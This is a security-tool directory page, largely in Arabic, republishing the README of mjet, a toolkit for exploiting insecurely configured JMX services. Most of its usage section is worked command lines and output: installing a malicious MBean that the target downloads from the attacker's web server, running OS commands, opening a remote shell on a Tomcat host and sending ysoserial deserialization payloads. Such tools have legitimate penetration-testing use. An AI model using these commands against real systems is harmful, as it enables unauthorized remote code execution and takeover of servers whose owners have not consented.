Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
mjet — مجموعة أدوات استغلال JMX من MOGWAI LABS | Kitploit
أدوات/GitHubGitHub/mogwailabs/mjet
توليد الحمولةالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمرأداة الوصول عن بعدArchived
GitHubmogwailabs/mjet

mjet

مجموعة أدوات استغلال JMX من MOGWAI LABS

عرض المستودع
2054711منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MJET by MOGWAI LABS

MOGWAI LABS JMX Exploitation Toolkit

MJET هو تفرّع من sjet، الذي طوّرته شركة siberas ولكن لم يعد يُصان بنشاط. يتم صيانة MJET بواسطة فريق MOGWAI LABS الذي قدّم أيضًا معظم الشيفرة الأصلية لـ sjet.

يتيح MJET استغلالاً سهلاً لخدمات JMX غير الآمنة التكوين. يمكن العثور على معلومات أساسية إضافية هنا وهنا.

!!! مهم: لم يعد هذا المشروع قيد الصيانة

هذا المستودع لم يعد قيد الصيانة النشطة. ننصح باستخدام qtcs beanshooter بدلاً منه.

المتطلبات الأساسية

  • Jython 2.7
  • Ysoserial (لاستغلال ثغرات إلغاء التسلسل عبر JMX)
  • opendmk_jmxremote_optional_jar-1.0-b01-ea.jar (لدعم بروتوكول رسائل JMX البديل (JMXMP))

الاستخدام

ينفّذ MJET واجهة سطر أوامر (باستخدام argparse):

jython mjet.py targetHost targetPort MODE password (modeOptions)

حيث

  • targetHost - عنوان IP للهدف
  • targetPort - منفذ الهدف حيث تعمل JMX
  • MODE - وضع السكربت
  • modeOptions - خيارات الوضع المحدد

دعم المصادقة (إذا تم تمكين مصادقة JMX):

  • --jmxrole - اسم المستخدم
  • --jmxpassword - كلمة المرور

وسائط اختيارية أخرى:

  • --jmxmp - استخدم JMX-MP (يتطلب تحميل JAR إضافية)
  • --localhost_bypass - منفذ الخدمة للوكيل في تجاوز localhost
  • --shell - استخدم الصدفة المعرّفة
  • --rmiObjectName - اسم RMI لنقطة نهاية JMX

الأوضاع وخياراتها

  • install - يثبّت الحمولة في الهدف الحالي
    • password - كلمة المرور التي يجب تعيينها بعد التثبيت الناجح
    • payload_url - عنوان URL الكامل لتحميل الحمولة
    • payload_port - منفذ تحميل الحمولة
  • uninstall - يزيل الحمولة من الهدف الحالي
  • changepw - يغيّر كلمة المرور على حمولة منشورة بالفعل
    • password - كلمة المرور للوصول إلى MBean المثبّت
    • newpass - كلمة المرور الجديدة
  • command - يشغّل الأمر CMD في targetHost
    • password - كلمة المرور للوصول إلى MBean المثبّت
    • CMD - الأمر المراد تشغيله
  • shell - يبدأ صدفة بسيطة في targetHost (مع قيود Runtime.exec() في جافا)
    • password - كلمة المرور للوصول إلى MBean المثبّت
  • javascript - يشغّل ملف جافاسكربت FILENAME في targetHost
    • password - كلمة المرور للوصول إلى MBean المثبّت
    • FILENAME - الجافاسكربت المراد تشغيله
  • deserialize - يرسل حمولة ysoserial إلى الهدف
    • gadget - gadget كما يوفره ysoserial، مثل CommonsCollections6
    • cmd - الأمر المراد تنفيذه
  • webserver - يشغّل خادم ويب MLET فقط
    • payload_url - عنوان URL الكامل لتحميل الحمولة
    • payload_port - منفذ تحميل الحمولة

أمثلة

تثبيت حمولة MBean على خدمة JMX قابلة للاستغلال

في المثال التالي، تعمل خدمة JMX القابلة للاستغلال على 10.165.188.23 المنفذ 2222، ولدى المهاجم عنوان IP 10.165.188.1. ستتصل خدمة JMX بخدمة الويب الخاصة بالمهاجم لتنزيل ملف الحمولة JAR. سيشغّل MJET خدمة الويب اللازمة على المنفذ 8000.

بعد التثبيت الناجح لـ MBean، يتم تغيير كلمة المرور الافتراضية إلى كلمة المرور التي تم توفيرها في سطر الأوامر ("super_secret").

h0ng10@rocksteady ~/w/mjet> java -jar jython-standalone-2.7.0.jar mjet.py 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://10.165.188.1:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
10.165.188.23 - - [26/Apr/2019 21:50:37] "GET / HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Successfully changed password
[+] Done
h0ng10@rocksteady ~/w/mjet> 

التثبيت ببيانات اعتماد JMX (يتطلب أيضًا تكوينًا ضعيفًا للخادم):

h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
mJET - MOGWAI LABS JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Using credentials: JMXUSER / JMXPASSWORD
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /mogwailabs_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanMogwaiLabs:name=payload,id=1
[+] Changing default password...
[+] Loaded de.mogwailabs.mlet.MogwaiLabsPayload
[+] Successfully changed password

h0ng10@rocksteady:~/mjet$

تشغيل الأمر 'ls -la' على هدف Linux:

بعد تثبيت الحمولة، يمكننا استخدامها لتنفيذ أوامر نظام التشغيل على الهدف.

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 command super_secret "ls -la"

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  4
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady ~/w/mjet>

التشغيل في وضع الصدفة

إذا كنت لا تريد تحميل Java لكل أمر، يمكنك استخدام "وضع الصدفة" للحصول على صدفة أوامر محدودة.

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 shell super_secret 

MJET - MOGWAI LABS JMX Exploitation Toolkit
===========================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://10.165.188.23:2222/jmxrmi
[+] Connected: rmi://10.165.188.1  5
[+] Use command 'exit_shell' to exit the shell
>>> ls -la
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: ls -la
total 20
drwxr-xr-x  5 root    root    4096 Apr 26 11:12 .
drwxr-xr-x 33 root    root    4096 Apr 10 13:54 ..
lrwxrwxrwx  1 root    root      12 Aug 13  2018 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Aug 13  2018 lib
lrwxrwxrwx  1 root    root      17 Aug 13  2018 logs -> ../../log/tomcat8
drwxr-xr-x  2 root    root    4096 Apr 26 11:12 policy
drwxrwxr-x  3 tomcat8 tomcat8 4096 Apr 10 13:54 webapps
lrwxrwxrwx  1 root    root      19 Aug 13  2018 work -> ../../cache/tomcat8


>>> pwd
[+] Loaded de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload
[+] Executing command: pwd
/var/lib/tomcat8


>>> exit_shell
[+] Done
h0ng10@rocksteady ~/w/mjet> 

استدعاء حمولة JavaScript على هدف:

يعرض السكربت النموذجي "javaproperties.js" خصائص Java الخاصة بالخدمة القابلة للاستغلال. يمكن استدعاؤه على النحو التالي:

h0ng10@rocksteady ~/w/mjet> jython mjet.py 10.165.188.23 2222 javascript super_secret scripts/javaproperties.js
تنزيل الأداة